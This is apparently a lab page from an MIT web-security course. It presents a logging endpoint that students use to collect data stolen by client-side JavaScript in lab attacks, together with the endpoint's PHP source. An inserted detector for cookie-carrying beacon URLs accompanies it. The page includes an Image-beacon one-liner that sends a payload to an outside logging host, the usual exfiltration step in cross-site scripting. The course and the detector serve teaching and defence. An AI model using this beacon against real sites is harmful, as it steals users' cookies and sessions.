You can use this server-side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.858/2022/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
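From the defending side, the request this link produces has a recognisable shape: a query string carrying an `id`, a `payload` and a `Math.random()` cache-buster. The detection check below is an added example, not part of the original page or the course's code; it decodes percent-encoding before matching, because a cookie's `=` and `#` travel as `%3D` and `%23` and a plain substring search on the raw URL misses them. Assumptions: full request URLs are available (for instance from an egress proxy log), and the host `collector.example`, the cookie name `LabSession` and the function names are hypothetical.

```javascript
// Added example (not the course's code): flag beacon URLs that carry a cookie.
// Assumption: full request URLs are available, e.g. from an egress proxy log.
const RANDOM_SHAPE = /^0\.\d+$/; // usual string form of Math.random()

// Percent-decode repeatedly (bounded) so double-encoded payloads are still seen.
function fullyDecode(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(current);
    } catch (e) {
      break; // malformed escape such as a bare "%": keep what we have
    }
    if (next === current) break;
    current = next;
  }
  return current;
}

// One finding per URL with a query value that contains "<cookieName>=".
function findCookieBeacons(urls, cookieNames) {
  const findings = [];
  for (const raw of urls) {
    let url;
    try { url = new URL(raw); } catch (e) { continue; } // not an absolute URL
    let cacheBuster = false;
    const leaked = new Set();
    for (const [, value] of url.searchParams) {
      if (RANDOM_SHAPE.test(value)) cacheBuster = true;
      const decoded = fullyDecode(value);
      for (const name of cookieNames) {
        if (decoded.includes(name + "=")) leaked.add(name);
      }
    }
    if (leaked.size > 0) findings.push({ host: url.host, cookies: [...leaked], cacheBuster });
  }
  return findings;
}

// Constructed sample URLs; host and cookie name are hypothetical.
const SAMPLE_URLS = [
  "https://collector.example/log.php?id=u1&payload=LabSession%3Dalice%230123abcd&random=0.4821",
  "https://collector.example/log.php?id=u1&payload=LabSession%253Dalice&random=0.9",
  "https://cdn.example/logo.png?v=0.5",
];
console.log(findCookieBeacons(SAMPLE_URLS, ["LabSession"]));
```

The third sample URL has a cache-buster but no cookie-shaped value, so it is not reported; the cache-buster is recorded only as a supporting signal on URLs that already match.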
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
In case you are curious, here is the source code of this page.
<?php
do {
    if (!array_key_exists("id", $_REQUEST)) {
        break;
    }
    $id = $_REQUEST['id'];
    if (strlen($id) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "ID value is larger than 1000 bytes";
        return;
    }
    if (!array_key_exists("payload", $_REQUEST)) {
        header("HTTP/1.0 400 Bad Request");
        echo "No payload given";
        return;
    }
    $payload = $_REQUEST['payload'];
    if (empty($payload)) {
        header("HTTP/1.0 400 Bad Request");
        echo "Empty payload given";
        return;
    }
    if (strlen($payload) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "Payload is larger than 1000 bytes";
        return;
    }
    if (!function_exists('apcu_add')) {
        header("HTTP/1.0 501 Not Implemented");
        echo "APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }
    if (apcu_add($payload, true, 5) === false) {
        // exact same $payload was sent in the past 5 seconds
        header("HTTP/1.0 429 Too Many Requests");
        echo "That exact payload was sent very recently; rejecting";
        return;
    }
    $payload = str_replace(array("\n", "\r"), '.', $payload);
    $id = str_replace(array("\n", "\r"), '.', $id);
    $file = fopen("/tmp/6.858-logger.txt", "c+");
    if ($file === false) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to open log file";
        return;
    }
    if (!flock($file, LOCK_EX)) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to lock log file";
        return;
    }
    $lines = array();
    while (!feof($file) && count($lines) < 100) {
        $lines[] = fgets($file);
    }
    ftruncate($file, 0);
    rewind($file);
    fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
    foreach ($lines as &$line) {
        fwrite($file, $line);
    }
    flock($file, LOCK_UN);
    fclose($file);
    echo "Logged!";
    return;
} while(0);

$link = "(new Image()).src="
      . "'https://css.csail.mit.edu/6.858/2022/labs/log.php?'"
      . " + 'id=my-username'"
      . " + '&payload=some-string' + '&random='"
      . " + Math.random()";
?><!DOCTYPE html>
<html>
  <head>
    <link rel="stylesheet" type="text/css" href="labs.css" />
    <title>Lab 4 Logging Script</title>
  </head>
  <body>
    <h1>Lab 4 Logging Script</h1>
    <p>
      You can use this server side script to extract data from
      client-side JavaScript. For example, clicking this client-side
      hyperlink will cause the server to log the payload:
    </p>
    <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
    <p>
      The random argument is ignored, but ensures that the browser
      bypasses its cache when downloading the image. We suggest that you
      use the random argument in your scripts as well. The ID argument
      will help you distinguish your log entries from those sent by other
      students; we suggest picking your MIT Athena username. Newlines are
      not allowed in <tt>javascript:</tt> links; if this bothers you, try
      <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
    </p>
    <h2>Test form</h2>
    <p>
      If you just want to try out the script, you can use this form.
      (For your actual attacks in lab 4, you'll probably want to use the
      JavaScript image technique shown above.)
    </p>
    <form method="GET" action="">
      <label for="id">ID:</label><br />
      <input name="id" placeholder="your-mit-username" size="40" />
      <i>(some identifier to locate your payload in the log)</i>
      <br />
      <br />
      <label for="payload">Payload:</label><br />
      <input name="payload" placeholder="some-string" size="40" />
      <i>(the information you stole)</i>
      <br />
      <input type="submit" value="Log" name="log_submit" />
    </form>
    <h2>Logged entries</h2>
    <p>
      Below are the most recent logged entries, so that you can check if
      your attack worked:
    </p>
    <pre class="tty"><?php $lines = file_get_contents("/tmp/6.858-logger.txt"); echo htmlspecialchars($lines); ?></pre>
    <h2>Source code</h2>
    <p>In case you are curious, here is the source code of this page.</p>
    <pre><?php highlight_file(__FILE__); ?></pre>
  </body>
</html>